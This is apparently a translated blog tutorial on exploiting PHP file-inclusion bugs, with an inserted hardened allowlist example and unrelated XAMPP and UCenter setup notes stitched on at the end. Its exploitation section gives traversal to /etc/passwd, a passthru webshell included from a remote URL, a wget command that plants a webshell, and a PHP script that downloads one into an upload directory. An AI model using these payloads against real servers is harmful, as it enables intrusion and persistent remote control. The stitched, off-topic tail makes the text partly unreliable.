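You might say: this is great, files can be included dynamically according to the URL, how convenient, so how does a vulnerability arise? The answer is: we are not well-behaved. We always like to be different from everyone else and will not follow the links as intended. We may want to write for ourselves which file to include (call). For example, we casually type in this URL: http://www.1steam.cn/php/index.php?page=hello.php. Our index.php program then naively follows the steps described above: it takes page as hello.php and goes on to include(hello.php). This is where the problem appears: because there is no hello.php file, the include raises warnings similar to the following:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3
Note that the first Warning above means the hello.php file we specified could not be found, i.e. the file at the path we specified could not be included. The second warning appears because the specified file was not found, so the include itself raises a warning.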
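A hardened form of the index.php above, as an added example that is not code from the original article: the page parameter only selects an entry from a fixed allowlist and never reaches include as a path. The page names, the pages/ directory and the function name resolve_page are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not from the original article): hardened replacement for
// the vulnerable index.php. Assumption: page templates live in a "pages"
// directory next to this script.
//
// Related php.ini settings: allow_url_include = Off (the default since
// PHP 5.2) stops include from fetching http:// URLs, and open_basedir
// limits which directories PHP may open at all.

// Allowlist: request value => file name. Only these files can be included.
const PAGES = [
    'home'      => 'home.php',
    'main'      => 'main.php',
    'downloads' => 'downloads.php',
];

/**
 * Map the untrusted ?page= value to a file path, or return null if rejected.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact-match lookup: "../", absolute paths and "http://..." values
    // are simply not keys in the allowlist.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside
    // $baseDir (catches a symlink planted in the pages directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Same default as the original script: no page given means home.php.
$requested = $_GET['page'] ?? 'home';
if ($requested === '') {
    $requested = 'home';
}

$path = resolve_page($requested, __DIR__ . '/pages');

if ($path === null) {
    // Do not echo the requested value or a filesystem path back to the
    // client: the warnings quoted above leaked /vhost/wwwroot/php/.
    http_response_code(404);
    error_log('rejected page parameter: ' . json_encode($requested));
    exit('Page not found');
}

include $path;
```

With display_errors turned off in production, a rejected value shows up only in the server's error log, which is also where repeated probing of the page parameter can be spotted.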
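IV. How it is exploited
As shown above, there is a problem. So how is such a vulnerability exploited? There are actually many ways, but in essence they are all much the same. Here I describe three of the more common ones:
1. Including and reading other files on the target machine
As seen above, because the page parameter that is obtained is not filtered, we can arbitrarily specify other sensitive files on the target host. For example, in the earlier warning we can see the exposed absolute path (vhost/wwwroot/php/), so we can probe repeatedly to include other files. For instance, specifying the URL http://www.php100.com/php/index.php?page=./txt.txt reads the txt.txt file under the current path. ../../ can also be used for directory traversal (if ../ is not filtered), or an absolute path can be specified directly to read sensitive system files, as with this URL: http://www.php100.com/php/index.php?page=/etc/passwd. If the target host does not restrict permissions strictly, or Apache is started with relatively high privileges, the content of this file can be read. Otherwise you get a Warning similar to: open_basedir restriction in effect.
2. Including a runnable PHP trojan
If "allow_url_fopen" on the target host is enabled (it is enabled by default, and few people change it), there is more room for exploitation: we can specify a webshell containing PHP code at another URL and run it directly. For example, I first write a piece of PHP code that runs commands (commented, so it should be understandable), saved as cmd.txt as follows (the extension doesn't matter, as long as the content is in PHP format).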
if (get_magic_quotes_gpc())
{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} // strip escape characters (removes backslashes from the string)
ini_set("max_execution_time",0); // set the execution time limit for this file; 0 means unlimited
echo "
1.S.T
"; // print the marker line for the start of the returned output
passthru($_REQUEST["cmd"]); // run the command specified by cmd
echo "
1.S.T
"; // print the marker line for the end of the returned output
?>
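The purpose of the file above is to accept the command specified by cmd, execute it by calling the passthru function, and return the output between the 1.S.T markers. Save this file on a server of our own (it can be a host that does not support PHP), as long as it is reachable over HTTP, for example at http://www.php100.com/cmd.txt. Then we can construct the following URL on the vulnerable host to exploit it: http://www.php100.com/php/index.php?page=http://www.php100.net/cmd.txt?cmd=ls, where what follows cmd is the command you want to execute. Other commonly used commands (taking *UNIX as an example) are:
Quote:
ll: list directories and files (equivalent to dir on Windows)
pwd: show the current absolute path
id whoami: show the current user
wget: download the file at a specified URL
And so on; look the rest up on Baidu yourself, I won't list them.
The method above amounts to obtaining a webshell (although this PHP file is not on the target machine, it really is a webshell, isn't it? Heh.)
3. Including a PHP file that creates a file
Some people may feel more at ease with a real webshell on the target machine: what if one day someone notices this inclusion vulnerability and patches it, so that we can no longer remotely include the "pseudo" webshell above? That mindset is understandable, so let's continue. For obtaining a real webshell, we again describe two common methods:
1) Using a command such as wget to download a webshell
This is fairly simple and very common. In the pseudo webshell obtained above we can execute commands, so we can also call a very powerful tool on the system, wget. You can google how powerful this command is; it has a pile of parameters that will make your head spin, heh. We don't need anything that complicated; we just use -O (--output-document=FILE, write the document to FILE), heh.
The precondition is that, following the earlier steps, you place a webshell containing PHP code somewhere reachable over HTTP, FTP or the like, for example http://www.php100.com/1stphp.txt; this file contains the webshell. Then we execute the following URL in the pseudo webshell obtained earlier: http://www.php100.com/php/index.php?page=http://www.php100.com/cmd.txt?cmd=wgethttp://www.php100.net/1stphp.txt-O 1stphp.php. If the current directory is writable, we get a webshell named 1stphp.php; if it is not writable, another approach is needed.
2) Creating it with a file
The wget approach may run into a current directory that is not writable, or the target host may have disabled (or not installed) the command, so we need another workaround: we can combine the inclusion vulnerability above to include a PHP script that creates (writes) a file, with the following content: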
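$f=file_get_contents("http://www.php100.com/1stphp.txt"); // open a stream to the file at the specified path
$ff=fopen("./upload/1st.php","a"); // find a usable directory and create a file
fwrite ($ff,$f); // write the stream opened above into the created file
fclose($ff); // close and save the file
?>
It still writes the same PHP file we downloaded with wget above, but the method is improved by implementing it in a PHP script. You can use cmd.php?cmd=ll from above to find a writable directory, such as upload here, and then create the file in that directory: ./upload/1st.php. Then we have our webshell.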
http://hi.baidu.com/cg_kevin/blog/item/933b73cc20ea5821b700c841.html
Accessing XAMPP shows "New XAMPP security concept"
New XAMPP security concept: Solution: open httpd-xampp.conf (/xampp/apache/conf/extra/httpd-xampp.conf), find the following content and comment out the Deny from all line, i.e.
To fix the problems with mysql, phpmyadmin and the xampp directory, simply use
=> http://localhost/security/xamppsecurity.php <=
http://192.168.100.182/security/
Success: the XAMPP directory is now protected! All personal data was safed in the following file:
C:\soft\xampp\security\xampp.users
C:\soft\xampp\htdocs\xampp\.htaccess
https://xiamiwang.net/uc16/install/index.php
The file data/config.inc.php does not exist, perhaps because of UCenter has not been installed, Please click here to install it..
Sorry, please set short_open_tag in php.ini to On; otherwise the installation cannot continue.
You must resolve the issues above before the installation can continue
C:\soft\xampp\php>vim php.ini
...
; modify by lindows.iteye.com 20110615
short_open_tag = On
...
C:\soft\xampp>xampp_restart.exe
Restarting "xampp"...
"xampp" is restarted.
https://xiamiwang.net/dz20/install/index.php
Ucenter URL https://www.xiamiwang.net/uc16
Site URL http://www.xiamiwang.net
end